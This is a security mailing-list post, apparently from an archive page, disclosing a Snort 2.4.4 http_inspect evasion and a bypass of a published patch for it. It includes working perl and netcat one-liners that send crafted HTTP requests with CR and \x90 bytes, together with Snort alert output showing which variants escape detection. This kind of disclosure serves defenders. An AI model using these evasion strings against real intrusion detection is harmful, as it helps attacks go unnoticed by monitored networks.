New Snort Bypass - Patch - Bypass of Patch

There was a Snort evasion bug posted on BugTraq today
http://www.securityfocus.com/archive/1/435600/30/0/threaded

This attack will not show up in alert file at all
perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc 192.168.1.3 80

Notice the \x0d CR character (\r) above.

The following will show up in alert as 'BARE BYTE UNICODE ENCODING'
perl -e 'print "GET \x90\x90 http/1.0\r\n\r\n"'|nc 192.168.1.3 80
Notice no \x0d CR character above.

We have confirmed it on a Debian box, Snort 2.4.4 Build 28. I have
applied the Demarc patch found here
http://www.demarc.com/files/patch_20060531/snort-2.4.4-demarc-patch.diff

There patch appears to work at first glance generating this error in
'alert':

[**] [119:2:1] (http_inspect) DOUBLE DECODING ATTACK [**]
06/03-15:19:04.185301 192.168.1.4:58107 -> 192.168.1.3:80
TCP TTL:64 TOS:0x0 ID:13064 IpLen:20 DgmLen:72 DF
***AP*** Seq: 0x306F2919 Ack: 0x40DA48CC Win: 0x5B4 TcpLen: 32
TCP Options (3) => NOP NOP TS: 21436964 36363323

However we can once again bypass this by including our CR character
before our string like so:

perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc
192.168.1.3 80

No alert is generated from the string above.

If we change the above to not include the \x0d CR character snort with
the demarc patch will generate an error:

perl -e 'print "GET /index.php\x90\x90 HTTP/1.0\n\r\n"'|nc 192.168.1.3
80

[**] [119:4:1] (http_inspect) BARE BYTE UNICODE ENCODING [**]
06/03-15:21:50.872878 192.168.1.4:58117 -> 192.168.1.3:80
TCP TTL:64 TOS:0x0 ID:33947 IpLen:20 DgmLen:80 DF
***AP*** Seq: 0x3A1121F3 Ack: 0x4ADDCB4A Win: 0x5B4 TcpLen: 32
TCP Options (3) => NOP NOP TS: 21603698 36530036

(notice the error is BARE BYTE UNICODE ENCODING not DOUBLE DECODING
ATTACK)

We are not sure how much this may buy an attacker as the CR character
may mess up any requests to the webserver, further research is needed
on this. As the Demarc advisory states there may be more impacts to
this bug that will come out in time. Kudos to Demarc for finding this
bug.

Chris
www.sigint-consulting.com
info@xxxxxxxxxxxxxxxxxxxxx

Relevant Pages

  • {O} 1.1.0 Monster Attack Spoilers
    ... Only a few minor grammatical fixes since the previous version; nothing substantial seems to have changed in the handling of monster attacks since version 0.7.0. ... the method of attack that a monster uses has only ... each blow there is a 50% chance that that blow is allowed to inflict ... If the player accepts, the character gains ...
    (rec.games.roguelike.angband)
  • Re: Guild Wars - best all around character class for solo?
    ... > what others think would be the "best" solo character type. ... since they have a bad habit of dying next to an army of monsters. ... attack the monster. ... Also if you get SCOURGE HEALING you can cut down a lot ...
    (comp.sys.ibm.pc.games.rpg)
  • Re: 4e PHB1&2 holiday bundle
    ... Rogue has no classes; Everquest ... he is ready to attack. ... red to my character is 6 or more levels above, ... The ice giant runs over and starts attacking. ...
    (rec.games.frp.dnd)
  • Re: Highlighting blanks via GO TO SPECIAL is not highlighting blank cells - HELP, Im totally s
    ... thought the ONE THING that would be benign would be the good old tilde! ... In the end, to get it done, I did the "via notepad" trick. ... Finally found the bug reporting page by signing in with Passport, ... is a wildcard that represents any one character. ...
    (microsoft.public.excel.misc)
  • Re: Good initiative mechanics?
    ... In each round, each character has a certain number of active blows, and ... an unparried attack is likely to hit and a parried ... Unless, perhaps, defences don't really matter. ... door man with very high reactions is key to weeding out the last couple ...
    (rec.games.frp.advocacy)
Quantcast